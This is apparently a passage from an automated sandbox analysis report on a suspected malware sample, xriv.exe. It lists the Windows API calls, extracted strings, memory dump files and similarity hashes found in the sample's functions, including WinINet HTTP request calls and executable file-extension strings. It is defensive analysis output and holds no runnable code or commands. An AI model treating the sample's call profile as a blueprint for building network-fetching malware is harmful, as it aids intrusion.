                              • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 013731D9
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 013732D5
                              • HeapFree.KERNEL32(00000000), ref: 013732DE
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013732E3
                              • HeapFree.KERNEL32(00000000), ref: 013732E6
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 013732ED
                              • HeapFree.KERNEL32(00000000), ref: 013732F0
                              • LocalFree.KERNEL32(00000000), ref: 013732F5
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                              • String ID:
                              • API String ID: 3326663573-0
                              • Opcode ID: 7ac5f4f51ecd6a038092d4d498aa0b819fd3aa5c39e9b0fb8a5efaef3d65ef9c
                              • Instruction ID: 995e5c8b0cdd97568ca0607808424e11c68f712f67b190c061595344e328346c
                              • Opcode Fuzzy Hash: 7ac5f4f51ecd6a038092d4d498aa0b819fd3aa5c39e9b0fb8a5efaef3d65ef9c
                              • Instruction Fuzzy Hash: C87161B1D00209AFEB25DFA9DC84BAFBBBDFF48314F104529E905A7244DB359905CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • ___free_lconv_mon.LIBCMT ref: 01391705
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 013912BB
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 013912CD
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 013912DF
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 013912F1
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 01391303
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 01391315
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 01391327
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 01391339
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 0139134B
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 0139135D
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 0139136F
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 01391381
                                • Part of subcall function 0139129E: _free.LIBCMT ref: 01391393
                              • _free.LIBCMT ref: 013916FA
                                • Part of subcall function 0138D653: HeapFree.KERNEL32(00000000,00000000,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?), ref: 0138D669
                                • Part of subcall function 0138D653: GetLastError.KERNEL32(?,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?,?), ref: 0138D67B
                              • _free.LIBCMT ref: 0139171C
                              • _free.LIBCMT ref: 01391731
                              • _free.LIBCMT ref: 0139173C
                              • _free.LIBCMT ref: 0139175E
                              • _free.LIBCMT ref: 01391771
                              • _free.LIBCMT ref: 0139177F
                              • _free.LIBCMT ref: 0139178A
                              • _free.LIBCMT ref: 013917C2
                              • _free.LIBCMT ref: 013917C9
                              • _free.LIBCMT ref: 013917E6
                              • _free.LIBCMT ref: 013917FE
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                              • String ID:
                              • API String ID: 161543041-0
                              • Opcode ID: fbf84e8fd6dd4c9ed373ae9a625eb171d1ee7e34edf44b9680150ffc25ab73c7
                              • Instruction ID: 31bb184e709f21df70e7d2ed2ceea0439bf35b466cd808f97c48d8c66da53b3f
                              • Opcode Fuzzy Hash: fbf84e8fd6dd4c9ed373ae9a625eb171d1ee7e34edf44b9680150ffc25ab73c7
                              • Instruction Fuzzy Hash: 5C312A356043079FEF21AB7DD844B5E77E9EF0067CF54882AE559E7190DA70E980CB24
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • IsInExceptionSpec.LIBVCRUNTIME ref: 01388CC2
                              • type_info::operator==.LIBVCRUNTIME ref: 01388CE9
                              • ___TypeMatch.LIBVCRUNTIME ref: 01388DF5
                              • IsInExceptionSpec.LIBVCRUNTIME ref: 01388ED0
                              • _UnwindNestedFrames.LIBCMT ref: 01388F57
                              • CallUnexpected.LIBVCRUNTIME ref: 01388F72
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                              • String ID: csm$csm$csm
                              • API String ID: 2123188842-393685449
                              • Opcode ID: 7c0d9d66f214063ae089b1d36cfeb8a61220e71c2031bf0bcb1cfea7418faf21
                              • Instruction ID: 30199b1dd22fbc03c6820dc0593a35ced50f122a8d8d6a859f8bd3ef9de90978
                              • Opcode Fuzzy Hash: 7c0d9d66f214063ae089b1d36cfeb8a61220e71c2031bf0bcb1cfea7418faf21
                              • Instruction Fuzzy Hash: B4C19E7180030AEFCF29FF98D8809AEBBB5BF14318F84459AE9056B252D331DA55CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _free.LIBCMT ref: 0138DE42
                                • Part of subcall function 0138D653: HeapFree.KERNEL32(00000000,00000000,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?), ref: 0138D669
                                • Part of subcall function 0138D653: GetLastError.KERNEL32(?,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?,?), ref: 0138D67B
                              • _free.LIBCMT ref: 0138DE4E
                              • _free.LIBCMT ref: 0138DE59
                              • _free.LIBCMT ref: 0138DE64
                              • _free.LIBCMT ref: 0138DE6F
                              • _free.LIBCMT ref: 0138DE7A
                              • _free.LIBCMT ref: 0138DE85
                              • _free.LIBCMT ref: 0138DE90
                              • _free.LIBCMT ref: 0138DE9B
                              • _free.LIBCMT ref: 0138DEA9
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: c8ff170345eff379a61a0fc6cc64f07317c51fa810498030fcb39022a501c48b
                              • Instruction ID: 6b063b843eb6b6fa52912475b2cacb385c9654a0775b7eaad43fe1d7b3ec873d
                              • Opcode Fuzzy Hash: c8ff170345eff379a61a0fc6cc64f07317c51fa810498030fcb39022a501c48b
                              • Instruction Fuzzy Hash: A521AD7690420EAFCB41EFD8C840DDD7BB9BF18658F418165F5199B160DB71D684CB80
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • InternetOpenW.WININET(013A3F6C,00000000,00000000,00000000,00000000), ref: 0137871C
                              • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 01378740
                              • HttpOpenRequestA.WININET(?,00000000), ref: 0137878A
                              • HttpSendRequestA.WININET(?,00000000), ref: 0137884A
                              • InternetReadFile.WININET(?,?,000003FF,?), ref: 013788FC
                              • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 013789B0
                              • InternetCloseHandle.WININET(?), ref: 013789D7
                              • InternetCloseHandle.WININET(?), ref: 013789DF
                              • InternetCloseHandle.WININET(?), ref: 013789E7
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSend
                              • String ID:
                              • API String ID: 1354133546-0
                              • Opcode ID: f2d29a2b89effa52cc61d4920276fd5b0a7cbc72d2bbd76c8a3088c0e9884ea3
                              • Instruction ID: 847181a3b602de6e61034ea0a546af310643b8cc85ce2b1a5a996acca482e83c
                              • Opcode Fuzzy Hash: f2d29a2b89effa52cc61d4920276fd5b0a7cbc72d2bbd76c8a3088c0e9884ea3
                              • Instruction Fuzzy Hash: CDC1F6B0A101189BEB28DF28CC88BEDBF75EF41318F5481D8E60997291D7799AC0CF95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8c1b03a0d3e4f281c52e89a3f485315f5c6f1fa307384b9b1325642ecd42ae7e
                              • Instruction ID: 2e8d8eb6243566e6805acd3f452bd07230e7f3202e083348224bc82434619e77
                              • Opcode Fuzzy Hash: 8c1b03a0d3e4f281c52e89a3f485315f5c6f1fa307384b9b1325642ecd42ae7e
                              • Instruction Fuzzy Hash: 62C1D771E0434AAFEF12DF9DD880BADBBB5AF49318F04405AE555AB386C7309981CF61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$___from_strstr_to_strchr
                              • String ID:
                              • API String ID: 3409252457-0
                              • Opcode ID: f0214389d01e24b23d970b492dd50e36d9adbea5adfb974a485ce11dfa5281a3
                              • Instruction ID: f3a595affd674c693366c8da595ddbc0af82aa3519728e2d978417ce2ad8b26c
                              • Opcode Fuzzy Hash: f0214389d01e24b23d970b492dd50e36d9adbea5adfb974a485ce11dfa5281a3
                              • Instruction Fuzzy Hash: 7A51F571944386AFEF29BFBC8880A6D7BFCAF0171CF04416AFA15AB285DB718140CB55
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _ValidateLocalCookies.LIBCMT ref: 013885A7
                              • ___except_validate_context_record.LIBVCRUNTIME ref: 013885AF
                              • _ValidateLocalCookies.LIBCMT ref: 01388638
                              • __IsNonwritableInCurrentImage.LIBCMT ref: 01388663
                              • _ValidateLocalCookies.LIBCMT ref: 013886B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                              • String ID: csm
                              • API String ID: 1170836740-1018135373
                              • Opcode ID: d008ab2c99ec83fd0d633baa9372bdd24fcfca22840353700a101542667ddd2d
                              • Instruction ID: 5aff8e76d1f78a5fc39131afe895d4061b92a4869a676ce1f6a1641c4451c19d
                              • Opcode Fuzzy Hash: d008ab2c99ec83fd0d633baa9372bdd24fcfca22840353700a101542667ddd2d
                              • Instruction Fuzzy Hash: EE418F34A00319EBCF10EF6CC884AAEBFB5AF5532CF548195EA159B352D731AA01CF91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: api-ms-$ext-ms-
                              • API String ID: 0-537541572
                              • Opcode ID: 682ae3c8339424a25670e5f708ac30b0a3142ff8b809cca5f8f76d74dc850084
                              • Instruction ID: 9ed59d6280ce078ee16f5a6b357f35b321061077af27b5474ba14b85a0a572e3
                              • Opcode Fuzzy Hash: 682ae3c8339424a25670e5f708ac30b0a3142ff8b809cca5f8f76d74dc850084
                              • Instruction Fuzzy Hash: C221E772A41325BFEB32BB6DDC44A5E3B5C9F557A8F150234ED06A7685D631E80086E0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 01391405: _free.LIBCMT ref: 0139142A
                              • _free.LIBCMT ref: 0139148B
                                • Part of subcall function 0138D653: HeapFree.KERNEL32(00000000,00000000,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?), ref: 0138D669
                                • Part of subcall function 0138D653: GetLastError.KERNEL32(?,?,0139142F,?,00000000,?,?,?,01391456,?,00000007,?,?,01391858,?,?), ref: 0138D67B
                              • _free.LIBCMT ref: 01391496
                              • _free.LIBCMT ref: 013914A1
                              • _free.LIBCMT ref: 013914F5
                              • _free.LIBCMT ref: 01391500
                              • _free.LIBCMT ref: 0139150B
                              • _free.LIBCMT ref: 01391516
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _free$ErrorFreeHeapLast
                              • String ID:
                              • API String ID: 776569668-0
                              • Opcode ID: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                              • Instruction ID: 2557e8f73ebaec5c890357d5ad7475af586d3ab2e281c852464aa8f0807e4a0c
                              • Opcode Fuzzy Hash: 745ba4c7df38b0c8b3501d58b22aa89868de86b005191e755d783c3d27d16807
                              • Instruction Fuzzy Hash: 71118172540B0BAADB20BFB5CC05FCB77BC9F18729F818815A29DBA090DA28B545C794
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetConsoleCP.KERNEL32(?,01375140,00000000), ref: 01392B40
                              • __fassign.LIBCMT ref: 01392D1F
                              • __fassign.LIBCMT ref: 01392D3C
                              • WriteFile.KERNEL32(?,01375140,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01392D84
                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01392DC4
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01392E70
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileWrite__fassign$ConsoleErrorLast
                              • String ID:
                              • API String ID: 4031098158-0
                              • Opcode ID: 040a36e02210f7ead16500e4ab56a4b692c30250ff0f77f5c72a95fe41afbcb9
                              • Instruction ID: 29548ac8c35e2bb1cf5918938cc58f0628149d4390ad76c6f473bb048780e53b
                              • Opcode Fuzzy Hash: 040a36e02210f7ead16500e4ab56a4b692c30250ff0f77f5c72a95fe41afbcb9
                              • Instruction Fuzzy Hash: B5D1AF71D00659AFDF15CFE8C8809EEBBB9BF48318F284169E959BB341D630A946CF50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetLastError.KERNEL32(?,?,01388887,01388476,01387AC4), ref: 0138889E
                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 013888AC
                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 013888C5
                              • SetLastError.KERNEL32(00000000,01388887,01388476,01387AC4), ref: 01388917
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLastValue___vcrt_
                              • String ID:
                              • API String ID: 3852720340-0
                              • Opcode ID: cdf32490b1b07271eb1995ec6339b31c6a07159f907b371f15b0fb0857bf6765
                              • Instruction ID: 4a9205488626b780e275fe47c34799086275137f11d24e9770a2da41ea8ad5ff
                              • Opcode Fuzzy Hash: cdf32490b1b07271eb1995ec6339b31c6a07159f907b371f15b0fb0857bf6765
                              • Instruction Fuzzy Hash: 0701D8329293126EFA35777D7C84A677A9CEF417FEB600269E520414D5EE1648004341
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, xrefs: 01390033
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                              • API String ID: 0-203307410
                              • Opcode ID: 90a383f4fe7fdcc84f96f5f2a1d10d24bb267cd80079698fc677477476bdd4d5
                              • Instruction ID: d0f60ddc17ac581610d989f0259abe9e5b38402b809b8a52c6a787a552c9f743
                              • Opcode Fuzzy Hash: 90a383f4fe7fdcc84f96f5f2a1d10d24bb267cd80079698fc677477476bdd4d5
                              • Instruction Fuzzy Hash: E7219F7160420BAFEF25BF6D8C8096BB7ADEF0026C7104524FA2996351EB31EC5087A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: _wcsrchr
                              • String ID: .bat$.cmd$.com$.exe
                              • API String ID: 1752292252-4019086052
                              • Opcode ID: 1d9cccba6b3fd3da45253653e595a07812f077e55d050dad5bb8ff4329702273
                              • Instruction ID: cb58834189a4a4dd1cfc5343e4cbf582a12afe70d3a4cb7c5860d0b24c4d97dd
                              • Opcode Fuzzy Hash: 1d9cccba6b3fd3da45253653e595a07812f077e55d050dad5bb8ff4329702273
                              • Instruction Fuzzy Hash: 6401963BA0472765FB15321EAC01667BBAC9BD2ABC726002EF958F7385EE55D84341A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: api-ms-
                              • API String ID: 0-2084034818
                              • Opcode ID: b49ffd2d647426565dbfd5c46e642497c34384ee9355f54fe9677ec80e584eb7
                              • Instruction ID: e1ca932fc0db6ac0fa2181860cb61955e951785e067c885d430aca02c29b79b8
                              • Opcode Fuzzy Hash: b49ffd2d647426565dbfd5c46e642497c34384ee9355f54fe9677ec80e584eb7
                              • Instruction Fuzzy Hash: B011B972A05327ABDB32AB2DDC44B7A375C9B817BCF110521E906A7285D630ED0087D1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0138A9D8,0138E000,?,0138A9A0,0138AF26,?,0138E000), ref: 0138A9F8
                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0138AA0B
                              • FreeLibrary.KERNEL32(00000000,?,?,0138A9D8,0138E000,?,0138A9A0,0138AF26,?,0138E000), ref: 0138AA2E
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: 72abf1e332238965ab09c87d8c13c41818184a7a3e8f70bfeb77645a74d304f5
                              • Instruction ID: 728a52c32e5ccde31a8e002723498c875ba9e7b5c4f547d7e8819a9e51775264
                              • Opcode Fuzzy Hash: 72abf1e332238965ab09c87d8c13c41818184a7a3e8f70bfeb77645a74d304f5
                              • Instruction Fuzzy Hash: BBF0A731501218FBEB21EB65DE0DBDDBE7CEB0475AF100064F601E2250DB798E10DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCPInfo.KERNEL32(0143CB30,0143CB30,?,7FFFFFFF,?,?,01396325,0143CB30,0143CB30,?,0143CB30,?,?,?,?,0143CB30), ref: 0139610C
                              • __alloca_probe_16.LIBCMT ref: 013961C2
                              • __alloca_probe_16.LIBCMT ref: 01396258
                              • __freea.LIBCMT ref: 013962C3
                              • __freea.LIBCMT ref: 013962CF
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: __alloca_probe_16__freea$Info
                              • String ID:
                              • API String ID: 2330168043-0
                              • Opcode ID: 8d18291aa9200dbe10421e86b80eafb3a9e75139aa75c4c0573db89e4178b250
                              • Instruction ID: 8ac9f6d57d89a0bfe2a2fa9eb99e5784a8233ec5b91a1b6435ccc2743d51924d
                              • Opcode Fuzzy Hash: 8d18291aa9200dbe10421e86b80eafb3a9e75139aa75c4c0573db89e4178b250
                              • Instruction Fuzzy Hash: AC81A7F2D0221A5BDF219FA8CC82AEE7BB9DF5925CF180195E944A7241D725CC40CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __alloca_probe_16.LIBCMT ref: 01394A18
                              • __alloca_probe_16.LIBCMT ref: 01394ADE
                              • __freea.LIBCMT ref: 01394B4A
                                • Part of subcall function 0138DB3C: RtlAllocateHeap.NTDLL(00000000,?,?,?,01388272,?,?,?,?,?,013720C3,?,?), ref: 0138DB6E
                              • __freea.LIBCMT ref: 01394B53
